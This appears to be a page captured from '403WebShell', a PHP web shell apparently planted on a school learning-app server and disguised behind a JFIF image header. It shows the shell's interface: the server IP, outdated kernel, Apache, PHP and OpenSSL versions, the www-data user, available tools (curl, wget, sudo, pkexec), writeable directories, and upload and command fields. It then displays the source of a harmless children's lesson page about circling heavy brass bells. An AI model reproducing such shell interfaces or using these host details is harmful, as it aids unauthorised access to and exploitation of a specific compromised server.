????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.139.237.30
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelD/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelD/Category2/LevelDCat2Lesson24.html
<!DOCTYPE html>
<html>
    <head>        
        <title>Circle heavy brass bells</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        
        <style type="text/css">
            
            svg
            {
                position: absolute;
                background-color: transparent;
            }
        
            </style>
        
            <script>
                function page_preLoad()
                {
                    shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No2);
                    
                    shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No2, 24), true, true);
                    shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                    
                    var ids_headings = ['id_td_heading1'];
                    
                    shared_adjust_fontSize_for_ids_all_devices(ids_headings, 70);
                    
                    setAllSvgsWidthHeightAndPositionFromTds();
                    
                    setAllEllipseStyles();
                }
            
                function page_onLoad()
                {
                    
                }
            
                function setAllSvgsWidthHeightAndPositionFromTds()
                {
                    var nTds = 2;
                    
                    for (var nthSet = 1; nthSet <= 3; nthSet++)
                    {
                        for (var nthTd = 1; nthTd <= nTds; nthTd++)
                        {
                            shared_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd + 'Set' + nthSet, 'id_svg' + nthTd + 'Set' + nthSet);
                        }
                    }
                }
                
                function setAllEllipseStyles()
                {
                    var allEllipseIdsArray = getAll3SetsEllipseIdsArray();
                    
                    for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++)
                    {
                        var id_ellipse = allEllipseIdsArray[indexEllipse];
                        
                        shared_svg_setEllipseStyle(id_ellipse);
                    }
                }
            
                function getAll3SetsEllipseIdsArray()
                {
                    var allEllipseIdsArray = new Array();
                    
                    for (var nthEllipse = 1; nthEllipse <= 5; nthEllipse++)
                    {
                        allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set1');
                    }
                    
                    for (var nthEllipse = 1; nthEllipse <= 4; nthEllipse++)
                    {
                        allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set2');
                    }
                    
                    for (var nthEllipse = 1; nthEllipse <= 4; nthEllipse++)
                    {
                        allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set3');
                    }
                    
                    return (allEllipseIdsArray);
                }
            
                function ellipse_click(id_ellipse)
                {
                    var set1Group1IdsArray = ['id_ellipse1Set1', 'id_ellipse2Set1'];
                    var set1Group2IdsArray = ['id_ellipse3Set1', 'id_ellipse4Set1', 'id_ellipse5Set1'];
                    
                    var set2Group1IdsArray = ['id_ellipse1Set2', 'id_ellipse2Set2'];
                    var set2Group2IdsArray = ['id_ellipse3Set2', 'id_ellipse4Set2'];
                    
                    var set3Group1IdsArray = ['id_ellipse1Set3', 'id_ellipse2Set3'];
                    var set3Group2IdsArray = ['id_ellipse3Set3', 'id_ellipse4Set3'];
                    
                    var allGroupsIdsArrayArray = [set1Group1IdsArray, set1Group2IdsArray, set2Group1IdsArray, set2Group2IdsArray, set3Group1IdsArray, set3Group2IdsArray];
                    
                    shared_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray);
                }
                
                function btnValidate_click()
                {
                    var allEllipseIdsArray = getAll3SetsEllipseIdsArray();
                    
                    var correctEllipseIdsArray = ['id_ellipse1Set1', 'id_ellipse4Set1', 'id_ellipse2Set2', 'id_ellipse3Set2', 'id_ellipse2Set3', 'id_ellipse4Set3'];
                    
                    var nCorrectEllipses = shared_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray);
                    
                    if (nCorrectEllipses == 6)
                    {
                        shared_show_claps_animation('shared_id_div_claps_image');
                    }
                }
            
                function btnPrevious_click()
                {
                    window.location = 'LevelDCat2Lesson23.html';
                }
                
                function btnNext_click()
                {
                    window.location = 'LevelDCat2Lesson25.html';
                }
                
                function btnHome_click()
                {
                    shared_btnHomeCategories_click('LevelD');
                }
            
            </script>
        </head>
    
    <body onLoad="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                    <tr height="5%">
                                        <td id="id_td_heading1" class="shared_style_black_24px_bold_padding_left_2_percent" align="left">
                                            Which <span style="color:red">brass bell</span> seems to be heavy? Circle it.</td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="33%">
                                                    <td id="id_td1Set1" width="50%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson24/brassBells1Set1.png" width="50%" draggable="false"/>
                                                            <svg id="id_svg1Set1" style="visibility: hidden">
                                                                <ellipse id="id_ellipse1Set1" cx="37%" cy="51%" rx="13%" ry="33%"/>
                                                                <ellipse id="id_ellipse2Set1" cx="67%" cy="52%" rx="10%" ry="30%"/>
                                                            </svg>
                                                    </td>
                                                    <td id="id_td2Set1" width="*" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson24/brassBells2Set1.png" width="55%" draggable="false"/>
                                                            <svg id="id_svg2Set1" style="visibility: hidden">
                                                                <ellipse id="id_ellipse3Set1" cx="32%" cy="55%" rx="8%" ry="21%"/>
                                                                <ellipse id="id_ellipse4Set1" cx="49%" cy="47%" rx="11%" ry="27%"/>
                                                                <ellipse id="id_ellipse5Set1" cx="67%" cy="53%" rx="10%" ry="25%"/>
                                                            </svg>
                                                    </td>
                                                </tr>
                                                <tr height="33%">
                                                    <td id="id_td1Set2" width="50%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson24/brassBells1Set2.png" width="55%" draggable="false"/>
                                                        <svg id="id_svg1Set2" style="visibility: hidden">
                                                            <ellipse id="id_ellipse1Set2" cx="30%" cy="53%" rx="10%" ry="25%"/>
                                                            <ellipse id="id_ellipse2Set2" cx="63%" cy="50%" rx="14%" ry="30%"/>
                                                        </svg>
                                                            </td>
                                                    <td id="id_td2Set2" width="*" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson24/brassBells2Set2.png" width="55%" draggable="false"/>
                                                        <svg id="id_svg2Set2" style="visibility: hidden">
                                                            <ellipse id="id_ellipse3Set2" cx="34%" cy="52%" rx="12%" ry="25%"/>
                                                            <ellipse id="id_ellipse4Set2" cx="66%" cy="50%" rx="11%" ry="24%"/>
                                                        </svg>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td id="id_td1Set3" width="50%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson24/brassBells1Set3.png" width="55%" draggable="false"/>
                                                        <svg id="id_svg1Set3" style="visibility: hidden">
                                                            <ellipse id="id_ellipse1Set3" cx="32%" cy="50%" rx="13%" ry="33%"/>
                                                            <ellipse id="id_ellipse2Set3" cx="65%" cy="53%" rx="12%" ry="26%"/>
                                                        </svg>
                                                    </td>
                                                    <td id="id_td2Set3" width="*" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson24/brassBells2Set3.png" width="55%" draggable="false"/>
                                                        <svg id="id_svg2Set3" style="visibility: hidden">
                                                            <ellipse id="id_ellipse3Set3" cx="32%" cy="50%" rx="10%" ry="23%"/>
                                                            <ellipse id="id_ellipse4Set3" cx="68%" cy="50%" rx="11%" ry="23%"/>
                                                        </svg>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        
        <script>
            page_preLoad();
            
        </script>
        
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit